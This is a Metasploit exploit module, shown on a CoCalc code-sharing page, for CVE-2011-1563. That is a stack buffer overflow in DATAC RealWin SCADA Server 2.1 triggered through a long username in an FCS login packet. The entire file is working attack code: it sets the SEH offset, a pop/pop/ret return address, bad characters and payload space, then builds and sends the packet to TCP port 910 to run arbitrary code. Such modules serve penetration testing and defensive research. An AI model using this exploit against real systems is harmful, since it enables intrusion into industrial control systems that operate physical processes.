CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/realwin_on_fcs_login.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'RealWin SCADA Server DATAC Login Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack buffer overflow in DATAC Control

17
        International RealWin SCADA Server 2.1 (Build 6.0.10.10) or

18
        earlier.  By sending a specially crafted On_FC_CONNECT_FCS_LOGIN

19
        packet containing a long username, an attacker may be able to

20
        execute arbitrary code.

21
      },

22
      'Author'         =>

23
        [

24
          'Luigi Auriemma', #discovery

25
          'MC',

26
          'B|H <bh[AT]bufferattack.com>'

27
        ],

28
      'License'        => MSF_LICENSE,

29
      'References'     =>

30
        [

31
          [ 'CVE', '2011-1563'],

32
          [ 'OSVDB', '72824'],

33
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],

34
          [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],

35
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']

36
        ],

37
      'Privileged'     => true,

38
      'DefaultOptions' =>

39
        {

40
          'EXITFUNC' => 'thread',

41
        },

42
      'Payload'        =>

43
        {

44
          'Space'    => 450,

45
          'BadChars' => "\x00\x20\x0a\x0d",

46
          'StackAdjustment' => -3500,

47
        },

48
      'Platform'       => 'win',

49
      'Targets'        =>

50
        [

51
          [ 'Universal',

52
            {

53
              'Offset'   => 392,         # Offset to SEH

54
              'Ret'      => 0x40012540,  # pop/pop/ret @FlexMLang.dll

55
            }

56
          ],

57
        ],

58
      'DefaultTarget' => 0,

59
      'DisclosureDate' => '2011-03-21'))

60


61
    register_options([Opt::RPORT(910)])

62
  end

63


64
  def exploit

65
    data =  [0x67542310].pack('V')

66
    data << [0x00000824].pack('V')

67
    data << [0x00110011].pack('V')

68
    data << "\x01\x00"

69
    data << rand_text_alpha_upper(target['Offset'])

70
    data << generate_seh_payload(target.ret)

71
    data << rand_text_alpha_upper(17706 - payload.encoded.length)

72
    data << [0x451c3500].pack('V')

73
    data << [0x00000154].pack('V')

74
    data << [0x00020040].pack('V')

75


76
    connect

77
    print_status("Trying target #{target.name}...")

78
    sock.put(data)

79
    select(nil,nil,nil,0.5)

80
    handler

81
    disconnect

82
  end

83
end

84


85